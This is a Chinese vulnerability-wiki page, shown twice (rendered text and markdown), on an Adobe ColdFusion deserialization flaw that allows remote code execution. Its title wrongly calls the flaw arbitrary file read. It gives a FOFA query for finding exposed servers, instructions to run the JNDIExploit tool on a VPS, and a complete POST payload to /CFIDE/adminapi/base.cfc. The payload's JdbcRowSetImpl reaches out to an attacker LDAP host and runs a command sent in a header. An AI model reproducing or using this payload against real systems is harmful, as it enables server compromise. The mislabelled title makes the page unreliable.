fofamini-wiki

登录白背景

源码

AdobeColdFusion pms存在任意文件读取

一、漏洞简介

Adobe ColdFusion是美国奥多比（Adobe）公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞，该漏洞源于受到不受信任数据反序列化漏洞的影响，攻击者通过漏洞可以实现代码执行，可导致服务器失陷，获取服务器权限。

二、影响版本

Adobe ColdFusion

三、资产测绘

fofaapp="Adobe-ColdFusion"
特征

四、漏洞复现

将JNDIExploit-1.4-SNAPSHOT.jar上传到VPS

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP

JNDIExploit-1.4-SNAPSHOT.jar

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xx:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

原文: https://www.yuque.com/xiaokp7/ocvun2/gd2peb34zlidiymd

# AdobeColdFusion pms存在任意文件读取

# 一、漏洞简介
Adobe ColdFusion是美国奥多比（Adobe）公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞，该漏洞源于受到不受信任数据反序列化漏洞的影响，攻击者通过漏洞可以实现代码执行，可导致服务器失陷，获取服务器权限。

# 二、影响版本
+ Adobe ColdFusion

# 三、资产测绘
+ fofa`app="Adobe-ColdFusion"`
+ 特征

![1706803881026-6970e736-4d4a-4857-a628-36a7122f0d7b.png](./img/XaOlV7-IGJ1BXRot/1706803881026-6970e736-4d4a-4857-a628-36a7122f0d7b-412149.png)

# 四、漏洞复现
将`JNDIExploit-1.4-SNAPSHOT.jar`上传到VPS

```plain
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP
```

[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/29512878/1721204556031-8ea50270-253b-4960-85da-360adbfe6abe.jar)

![1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef.png](./img/XaOlV7-IGJ1BXRot/1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef-417122.png)

```plain
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xx:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>
```

![1706803984143-eee4f7f4-f2c4-43b8-a8b7-a987552640ce.png](./img/XaOlV7-IGJ1BXRot/1706803984143-eee4f7f4-f2c4-43b8-a8b7-a987552640ce-981396.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gd2peb34zlidiymd>